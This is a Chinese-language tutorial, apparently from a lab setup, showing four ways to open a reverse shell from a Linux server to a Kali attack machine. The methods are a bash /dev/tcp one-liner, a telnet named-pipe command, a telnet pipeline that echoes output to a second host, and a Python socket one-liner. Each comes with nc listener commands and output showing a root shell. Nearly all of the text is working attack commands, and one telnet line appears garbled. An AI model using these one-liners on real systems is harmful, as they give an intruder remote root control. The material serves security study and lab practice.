反dshell

一、通过bash反dshell

1、 在攻击机上通过nc命令监听2222端口

┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvvp 2222
listening on [any] 2222 ...

2、在服务器上连接攻击机(192.168.137.131)上面监听的2222端口

[root@localhost netcat-0.7.1]# bash -i >& /dev/tcp/192.168.137.131/2222 0>&1

3、连接成功

┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvvp 2222
listening on [any] 2222 ...
192.168.137.130: inverse host lookup failed: Unknown host
connect to [192.168.137.131] from (UNKNOWN) [192.168.137.130] 60192
[root@localhost netcat-0.7.1]# id
id
uid=0(root) gid=0(root) 组=0(root)

二、通过telnet反dshell

1、在攻击机上通过nc命令监听2222端口

┌──(kali㉿kali)-[~/Desktop]
└─$ netcat -lvvp 2222

listening on [any] 2222 ...

2、在服务器上连接攻击机(192.168.137.131)上面监听的2222端口

[root@localhost hids]# mknod a p; telnet 192.168.137.131 2222 0a

3、连接成功

┌──(kali㉿kali)-[~/Desktop]
└─$ netcat -lvvp 2222

listening on [any] 2222 ...
192.168.137.130: inverse host lookup failed: Unknown host
connect to [192.168.137.131] from (UNKNOWN) [192.168.137.130] 50482
id;
uid=0(root) gid=0(root) 组=0(root)

三、通过telnet反dshell (执行结果在另一台机器上回显)

1、在攻击机(192.168.137.131)上通过nc命令监听2222端口

┌──(kali㉿kali)-[~/Desktop]
└─$ netcat -lvvp 2222

listening on [any] 2222 ...

2、在回显机(192.168.137.134)上通过nc命令监听3333端口

┌──(kali㉿kali)-[~/Desktop]
└─$ netcat -lvvp 3333

listening on [any] 3333 ...

3、在服务器上连接攻击机(192.168.137.131)上面监听的2222端口，同时通过管道发送到回显机(192.168.137.134)的3333端口上进行回显。

[root@localhost ~]# telnet 192.168.137.131 2222 | /bin/bash | telnet 192.168.137.134 3333
Trying 192.168.137.134...
Connected to 192.168.137.134.
Escape character is '^]'.
/bin/bash:行1: Trying: 未找到命令
/bin/bash:行2: Connected: 未找到命令
/bin/bash:行3: Escape: 未找到命令

4、攻击机(192.168.137.131)连接成功，并输入命令测试。

┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvvp 2222                                                                                                                                       130 ⨯
listening on [any] 2222 ...
192.168.137.130: inverse host lookup failed: Unknown host
connect to [192.168.137.131] from (UNKNOWN) [192.168.137.130] 51208
id

5、查看回显机（192.168.137.134)是否将命令执行结果回显。

┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvvp 3333
listening on [any] 3333 ...
192.168.137.130: inverse host lookup failed: Unknown host
connect to [192.168.137.134] from (UNKNOWN) [192.168.137.130] 45286
uid=0(root) gid=0(root) 组=0(root)

四、通过python反dshell

 1、在攻击机上通过nc命令监听2222端口

┌──(kali㉿kali)-[~/Desktop]
└─$ netcat -lvvp 2222

listening on [any] 2222 ...

2、在服务器上连接攻击机(192.168.137.131)上面监听的2222端口

[root@localhost ~]# python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.137.131",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

3、连接成功

┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvvp 2222                                                                                                                                       130 ⨯
listening on [any] 2222 ...
192.168.137.130: inverse host lookup failed: Unknown host
connect to [192.168.137.131] from (UNKNOWN) [192.168.137.130] 51006
sh-4.2# id
id
uid=0(root) gid=0(root) 组=0(root)